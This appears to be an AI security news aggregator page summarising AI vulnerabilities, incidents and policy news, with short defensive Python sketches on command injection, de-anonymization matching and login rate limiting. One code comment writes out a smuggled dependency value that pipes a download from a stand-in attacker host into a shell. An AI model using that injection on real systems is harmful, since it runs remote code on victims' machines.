aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by Truong (Jack) Luu, Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. AI Sec Watch was built by an Information Systems security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,678
Last 24 hours: 22
Last 7 days: 165
Daily Briefing: Monday, March 30, 2026
> Anthropic's Unreleased Cybersecurity Model Accidentally Exposed: A configuration error leaked details of Anthropic's powerful new AI model called Mythos, designed for cybersecurity use cases with advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The leak raises concerns because the model's improved vulnerability detection could enable more sophisticated cyberattacks, prompting Anthropic to plan a phased rollout to enterprise security teams first.

> Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where attackers insert malicious commands into input that gets executed) in its model serving code when using `env_manager=LOCAL`, allowing attackers to execute arbitrary commands by manipulating dependency information in the `python_env.yaml` file without any safety checks. (CVE-2025-15379, Critical)
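To illustrate the bug class, here is a hedged sketch (not MLflow's actual serving code; the function names and the validation pattern are invented for illustration). It contrasts splicing untrusted `python_env.yaml` dependency strings into a shell command, where metacharacters like `;` would execute, with a validated argument vector that keeps them inert.

```python
import re

# Hypothetical sketch -- not MLflow's actual code. Shows why untrusted
# dependency strings must never reach a shell unvalidated.

def build_unsafe_command(dependencies):
    # Vulnerable pattern: if this string is run with a shell (shell=True),
    # a dependency like "numpy; curl http://evil/x | sh" executes the
    # attacker's command after pip exits.
    return "pip install " + " ".join(dependencies)

# Rough allowlist for "name[extras]version" style requirement strings.
_DEP_RE = re.compile(
    r"^[A-Za-z0-9._-]+"                       # package name
    r"(\[[A-Za-z0-9._,-]+\])?"                # optional extras
    r"([<>=!~]=?[A-Za-z0-9.*]+(,[<>=!~]=?[A-Za-z0-9.*]+)*)?$"  # version spec
)

def validate_dependency(dep):
    """Accept only plain requirement strings; reject shell metacharacters."""
    return bool(_DEP_RE.match(dep))

def build_safe_command(dependencies):
    for dep in dependencies:
        if not validate_dependency(dep):
            raise ValueError(f"rejected suspicious dependency: {dep!r}")
    # Argument vector executed without a shell: metacharacters stay inert.
    return ["pip", "install", *dependencies]
```

The key design choice is defense in depth: even with the allowlist, the safe variant returns an argument list rather than a shell string, so a validator gap cannot escalate back into command execution.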

> Multiple High-Severity Flaws in AI Agent Frameworks: CrewAI has several vulnerabilities, including Docker fallback issues that enable RCE (remote code execution, where attackers run commands on systems they don't control) when containerization fails (CVE-2026-2287, CVE-2026-2275), while OpenClaw suffers from malicious plugin code execution during installation and sandbox bypass flaws that let agents access other agents' workspaces. SakaDev and HAI Build Code Generator can both be tricked through prompt injection (hiding malicious instructions in normal-looking input) into misclassifying dangerous terminal commands as safe and executing them automatically (CVE-2026-30306, CVE-2026-30308).

> ChatGPT Data Leakage Vulnerability Patched: OpenAI fixed a vulnerability that allowed attackers to secretly extract sensitive user data, including conversation messages and uploaded files, by exploiting a hidden DNS-based communication channel (covert data transmission using the Domain Name System) in ChatGPT's Linux runtime, bypassing the safety guardrails designed to prevent unauthorized data sharing.

Latest Intel

01

I checked out one of the biggest anti-AI protests ever

policy · industry

Mar 2, 2026

Anti-AI protest groups organized a march in London on February 28 with a couple hundred protesters expressing concerns about generative AI (AI systems trained on large amounts of data to generate text, images, or other content), ranging from job displacement and harmful content to existential risks. The protest represents a significant growth in organized anti-AI activism, with groups like Pause AI expanding rapidly since their 2023 founding to mobilize larger crowds around concerns that researchers have documented about AI systems like ChatGPT and Gemini.

MIT Technology Review
02

Anthropic confirms Claude is down in a worldwide outage

security
Mar 2, 2026

Claude, an AI assistant made by Anthropic, experienced a widespread outage on March 2, 2026, affecting users across all platforms including web, mobile, and API (the interface developers use to connect to the service). Users reported failed requests, timeouts (when the system doesn't respond in time), and inconsistent responses, with the company still investigating the cause as of the last update.

BleepingComputer
03

LLM-Assisted Deanonymization

security · privacy
Mar 2, 2026

Researchers demonstrated that LLMs (large language models, AI systems trained on vast amounts of text) can effectively de-anonymize people by identifying them from their anonymous online posts across platforms like Hacker News, Reddit, and LinkedIn. By analyzing just a handful of comments, these AI systems can infer personal details like location, occupation, and interests, then search the web to match and identify the anonymous user with high accuracy across tens of thousands of candidates.

Schneier on Security
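The final matching step described in item 03 can be sketched as a toy attribute-overlap ranking. This is a hedged illustration with invented profile data, not the researchers' pipeline: in the actual work, an LLM infers the attributes from anonymous comments and web search supplies the candidate pool.

```python
# Toy sketch of candidate matching for de-anonymization research.
# All names and attributes below are invented for illustration.

def score_candidates(inferred, candidates):
    """Rank candidate identities by overlap with the inferred attributes.

    inferred:   set of attribute strings (location, occupation, interests)
    candidates: mapping of candidate name -> set of known attributes
    """
    scores = {
        name: len(inferred & attrs) / max(len(inferred), 1)
        for name, attrs in candidates.items()
    }
    return sorted(scores.items(), key=lambda kv: kv[1], reverse=True)

# Example: three inferred attributes single out one of two profiles.
inferred = {"seattle", "embedded engineer", "rock climbing"}
candidates = {
    "profile_a": {"seattle", "embedded engineer", "rock climbing", "rust"},
    "profile_b": {"london", "lawyer", "cycling"},
}
ranking = score_candidates(inferred, candidates)
```

Even this crude scoring hints at why a handful of inferred attributes can discriminate among tens of thousands of candidates: each independent attribute sharply shrinks the set of plausible matches.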
04

Taming Agentic Browsers: Vulnerability in Chrome Allowed Extensions to Hijack New Gemini Panel

security
Mar 2, 2026

A high-severity vulnerability (CVE-2026-0628) in Google Chrome's Gemini AI feature allowed malicious extensions with basic permissions to hijack the Gemini panel and gain unauthorized access to sensitive resources such as the camera, microphone, screenshots, and local files. The vulnerability highlights how integrating AI directly into browsers creates new security risks when AI components are given overly broad access to the browser environment.

Fix: Google released a patch in early January 2026. The source also mentions Palo Alto Networks' Prisma Browser as a product designed to prevent extension-based attacks like this one.

Palo Alto Unit 42
05

I’m on the Meta Oversight Board. We need AI protections now | Suzanne Nossel

policy · safety
Mar 2, 2026

AI is developing faster than government regulation can keep up, creating risks like chatbots giving harmful advice to teens and potential misuse for creating biological weapons. Unlike industries such as nuclear power or pharmaceuticals, AI companies are not required to disclose safety problems or undergo independent testing before releasing new models to the public. The author argues that independent oversight of AI platforms is necessary to protect people's rights and safety.

The Guardian Technology
06

Innovation without exposure: A CISO’s secure-by-design framework for business outcomes

policy · security
Mar 2, 2026

Security leaders (CISOs, who oversee an organization's security strategy) face pressure to enable innovation like AI adoption while reducing risk and staying within budget constraints. The source argues that well-governed innovation actually reduces risk by preventing uncontrolled tool sprawl and shadow IT (unauthorized software systems), but unmanaged innovation creates fragile systems that increase damage from security incidents. The key is bringing discipline to experimentation by automating routine tasks, giving teams ownership of meaningful improvements with clear end goals, and using AI strategically only where it changes the risk equation without creating new vulnerabilities.

CSO Online
07

Bug in Google's Gemini AI Panel Opens Door to Hijacking

security
Mar 2, 2026

A bug in Google's Gemini AI panel in Chrome allowed attackers to escalate privileges (gain higher-level access to a system), violate user privacy during browsing, and access sensitive resources, opening the door to unauthorized control of the browser.

Dark Reading
08

Deepfake attack: 'Many people could have been cheated'

safety · security
Mar 2, 2026

Deepfakes (AI-generated fake videos that look real) are being used to trick people into financial fraud, with incidents ranging from fake stock advice videos in India to a $25 million theft at an engineering firm where employees were deceived by deepfake video calls. The technology is becoming easier and cheaper to create, making these attacks a growing threat to both individuals and companies.

BBC Technology
09

ClawJacked attack let malicious websites hijack OpenClaw to steal data

security
Mar 1, 2026

A vulnerability called ClawJacked in OpenClaw (a self-hosted AI platform that runs AI agents locally) allowed malicious websites to secretly take control of a running instance and steal data by brute-forcing the password through the browser. The attack exploited the fact that OpenClaw's gateway service listens on localhost (127.0.0.1, a local-only address) with a WebSocket interface (a two-way communication protocol), and localhost connections were exempt from rate limiting, allowing attackers to guess passwords hundreds of times per second without triggering protections.

Fix: Update to OpenClaw version 2026.2.26 or later immediately. According to the source, the fix "tightens WebSocket security checks and adds additional protections to prevent attackers from abusing localhost loopback connections to brute-force logins or hijack sessions, even if those connections are configured to be exempt from rate limiting."

BleepingComputer
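The uniform rate limiting described in item 09's fix can be sketched as follows. This is hypothetical code, not OpenClaw's implementation: it shows a login limiter with deliberately no exemption for loopback, since a malicious web page driving the victim's browser also arrives over 127.0.0.1.

```python
import time
from collections import defaultdict

# Hypothetical sketch -- not OpenClaw's code. Illustrates applying login
# rate limits uniformly, including to localhost (127.0.0.1) connections.

class LoginRateLimiter:
    def __init__(self, max_attempts=5, window_seconds=60.0):
        self.max_attempts = max_attempts
        self.window = window_seconds
        self.attempts = defaultdict(list)  # client address -> timestamps

    def allow(self, client_addr, now=None):
        # No special case for loopback: browser-relayed brute-force
        # attempts come from 127.0.0.1 just like legitimate local use.
        now = time.monotonic() if now is None else now
        recent = [t for t in self.attempts[client_addr] if now - t < self.window]
        self.attempts[client_addr] = recent
        if len(recent) >= self.max_attempts:
            return False  # over the limit: reject this login attempt
        recent.append(now)
        return True
```

With a cap of 5 attempts per 60 seconds, the hundreds-of-guesses-per-second brute force described in the article stalls after the fifth try, regardless of the client address.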
10

OpenAI reveals more details about its agreement with the Pentagon

policy · security
Mar 1, 2026

OpenAI reached an agreement with the Department of Defense to deploy its AI models in classified environments, after Anthropic's similar negotiations failed. OpenAI stated it has safeguards preventing use in mass domestic surveillance, autonomous weapons, or high-stakes automated decisions, implemented through a multi-layered approach including cloud deployment, human oversight, and contractual protections. However, critics argue the contract language may still allow domestic surveillance under existing executive orders, while OpenAI's leadership contends that deployment architecture (how the system is technically set up) matters more than contract terms for preventing misuse.

TechCrunch
Critical This Week

- CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis… (NVD/CVE Database, Mar 27, 2026)

- Attackers exploit critical Langflow RCE within hours as CISA sounds alarm (CSO Online, Mar 27, 2026)

- CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability (CISA Known Exploited Vulnerabilities, Mar 26, 2026)

- CISA: New Langflow flaw actively exploited to hijack AI workflows (BleepingComputer, Mar 26, 2026)